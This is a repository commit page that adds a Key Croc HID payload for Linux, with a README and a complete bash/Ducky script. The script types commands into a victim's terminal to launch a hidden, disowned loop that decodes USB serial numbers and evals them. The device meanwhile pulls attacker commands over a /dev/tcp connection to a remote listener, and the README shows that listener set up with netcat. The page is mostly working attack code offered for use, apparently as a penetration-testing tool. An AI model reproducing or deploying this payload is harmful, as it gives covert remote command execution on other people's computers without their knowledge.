Compare commits

...

3 Commits

Author SHA1 Message Date
Peaks e8647789b4
Merge pull request #66 from TW-D/master
"Linux" Blind OS Command Injection using Serial Number
2024-11-15 09:30:21 -05:00
TW-D 64baba392e
Merge pull request #1 from TW-D/lin_blind-os-command-injection_serial-number
"Linux" Blind OS Command Injection using Serial Number
2024-11-14 13:41:20 -05:00
TW-D 79ded6cde2
"Linux" Blind OS Command Injection using Serial Number
Allows a remote attacker to execute commands on a Linux system, 
using the serial number as a vector to pass the commands to be executed, 
without receiving feedback on the results of the commands.
2024-11-14 13:38:38 -05:00
3 changed files with 218 additions and 0 deletions

View File

@ -0,0 +1,75 @@
# "Linux" Blind OS Command Injection using Serial Number
- Title: "Linux" Blind OS Command Injection using Serial Number
- Author: TW-D
- Version: 1.0
- Target: Debian-Based Linux Distributions
- Category: Remote Access
- Attackmode: HID
## Description
Allows a remote attacker to execute commands on a Linux system,
using the serial number as a vector to pass the commands to be executed,
without receiving feedback on the results of the commands.
![schema](./readme_files/schema.png "schema")
__Note :__ *According to my tests, for the "Serial Number," the maximum size is 126 on Ubuntu 22.04.4 LTS.*
## Prerequisites
```bash
root@croc:~# apt-get install bc
```
## Configuration
From the file "lin_blind-os-command-injection_serial-number.txt" change the value of the following constants :
```
######## INITIALIZATION ########
readonly REMOTE_HOST="192.168.0.100"
readonly REMOTE_PORT="4444"
##
# 1D6B:0002 === Linux Foundation 2.0 root hub
# 1D6B:0003 === Linux Foundation 3.0 root hub
#
# NOTE : "Linux Foundation X.0 root hub" refers to a USB root hub
# managed by the Linux kernel. This hub handles the connections between
# the operating system and the physical USB ports on your machine.
##
readonly HID_VID="1D6B"
readonly HID_PID="0002"
######## SETUP ########
LED SETUP
export DUCKY_LANG="us"
```
## Trigger
>
> Not applicable because of matchless payload
>
## Usage
1. Edit "config.txt" on the Key Croc in "Arming Mode" to specify the WiFi network name and the associated password.
2. Then place the file "lin_blind-os-command-injection_serial-number.txt" in the "payloads/" directory.
3. Eject the Key Croc safely and then start, for example, "netcat" listening on the port you specified in the REMOTE_PORT constant.
```bash
hacker@hacker-computer:~$ nc -lnvvp 4444
[...]
shell> echo "$(hostname)" > /tmp/output.log
[CTRL + c]
```

View File

@ -0,0 +1,143 @@
#!/bin/bash
#
# Title: "Linux" Blind OS Command Injection using Serial Number
# Description:
# Allows a remote attacker to execute commands on a Linux system,
# using the serial number as a vector to pass the commands to be executed,
# without receiving feedback on the results of the commands.
#
# Author: TW-D
# Version: 1.0
# Target: Debian-Based Linux Distributions
# Category: Remote Access
# Attackmode: HID
#
# TESTED ON
# ===============
# Key Croc 1.4-stable and Ubuntu 22.04.4 LTS
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## TRIGGER ########
#
# Not applicable because of matchless payload
#
######## INITIALIZATION ########
readonly REMOTE_HOST="192.168.0.100"
readonly REMOTE_PORT="4444"
##
# 1D6B:0002 === Linux Foundation 2.0 root hub
# 1D6B:0003 === Linux Foundation 3.0 root hub
#
# NOTE : "Linux Foundation X.0 root hub" refers to a USB root hub
# managed by the Linux kernel. This hub handles the connections between
# the operating system and the physical USB ports on your machine.
##
readonly HID_VID="1D6B"
readonly HID_PID="0002"
######## SETUP ########
LED SETUP
export DUCKY_LANG="us"
######## ATTACK ########
LED ATTACK
ATTACKMODE HID
QUACK CTRL-ALT t
QUACK DELAY 1500
QUACK STRING " nohup \"\${BASH}\" -c '"
QUACK STRING "serial_chunks=();"
QUACK STRING " while true; do"
QUACK STRING " serial_chunk=\"\$(lsusb -v -d $HID_VID:$HID_PID 2> /dev/null | grep \"iSerial\" | awk \"{if(length(\\\$3) == 64) print \\\$3}\")\";"
QUACK STRING " if [[ -n \"\${serial_chunk}\" && ! \"\${serial_chunks[*]}\" =~ \$serial_chunk ]]; then"
QUACK STRING " serial_chunks+=(\"\${serial_chunk}\");"
QUACK STRING " if [[ \"\${serial_chunk}\" == *\".\"* ]]; then"
QUACK STRING " IFS=\":\" read -r -a decimal_chunks <<< \"\$(printf \"%s\" \"\${serial_chunks[@]}\")\";"
QUACK STRING " binary_concat=\"\";"
QUACK STRING " for decimal_chunk in \"\${decimal_chunks[@]}\"; do"
QUACK STRING " decimal_chunk=\"\${decimal_chunk%%.*}\";"
QUACK STRING " binary_concat+=\"\$(printf %016d \"\$(echo \"obase=2; \${decimal_chunk}\" | bc)\")\";"
QUACK STRING " done;"
QUACK STRING " payload=\"\$(for (( i=0; i<\${#binary_concat}; i+=8 )); do printf %s \"\\\x\$(printf %x \$((2#\${binary_concat:i:8})))\"; done)\";"
QUACK STRING " eval \"\$(echo -e \"\${payload}\")\";"
QUACK STRING " serial_chunks=();"
QUACK STRING " sleep 3;"
QUACK STRING " fi;"
QUACK STRING " fi;"
QUACK STRING " sleep 1;"
QUACK STRING " done"
QUACK STRING "' &> /dev/null &"
QUACK DELAY 250
QUACK ENTER
QUACK DELAY 1000
QUACK STRING " disown && exit"
QUACK DELAY 250
QUACK ENTER
######## STAGE2 ########
LED STAGE2
exec 3<>/dev/tcp/${REMOTE_HOST}/${REMOTE_PORT}
while true; do
if echo -n "shell> " >&3; then
if read -r payload <&3; then
binary="$(for (( i=0; i<${#payload}; i++ )); do printf %08d "$(echo "obase=2; $(printf "%d" "'${payload:i:1}")" | bc)"; done)"
decimal_chunks=()
while [ -n "${binary}" ]; do
binary_chunk="${binary:0:16}"
decimal_chunks+=("$(echo "ibase=2; ${binary_chunk}" | bc)")
binary="${binary:16}"
done
decimal_join="$(IFS=":"; echo "${decimal_chunks[*]}.")"
while [ -n "${decimal_join}" ]; do
while [ "${#decimal_join}" -lt 64 ]; do
decimal_join="${decimal_join}0"
done
ATTACKMODE HID VID_"0X${HID_VID}" PID_"0X${HID_PID}" SERIAL_"${decimal_join:0:64}"
ATTACKMODE OFF
decimal_join="${decimal_join:64}"
done
else
break
fi
else
break
fi
done
exec 3<&-
exec 3>&-
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
ATTACKMODE OFF
######## OFF ########
LED OFF
shutdown -h now

Binary file not shown.

After

Width:  |  Height:  |  Size: 59 KiB